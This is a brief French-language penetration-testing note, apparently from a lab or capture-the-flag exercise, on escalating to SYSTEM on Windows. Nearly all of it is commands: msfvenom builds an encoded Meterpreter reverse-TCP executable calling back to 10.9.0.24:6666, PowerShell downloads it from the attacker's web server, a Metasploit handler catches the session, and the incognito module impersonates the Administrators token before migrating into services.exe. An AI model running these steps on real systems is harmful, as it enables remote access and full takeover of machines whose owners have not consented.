Si on se rend compte que nous avons les privilèges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter
Nous créer le code initial pour avoir une session meterpreter
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe
Téléchargement du code
sudo python -m http.server 80
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.0.24','shell.exe')"
Préparation dans msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.9.0.24
set LPORT 6666
run
Exécution du code
shell.exe
Nous avons maintenant une session dans metasploit.
load incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators"
getuid
ps #pour trouver le pid du processus services.exe
migrate <em>services_pid</em>
shell
whoami #devrait être nt authority\system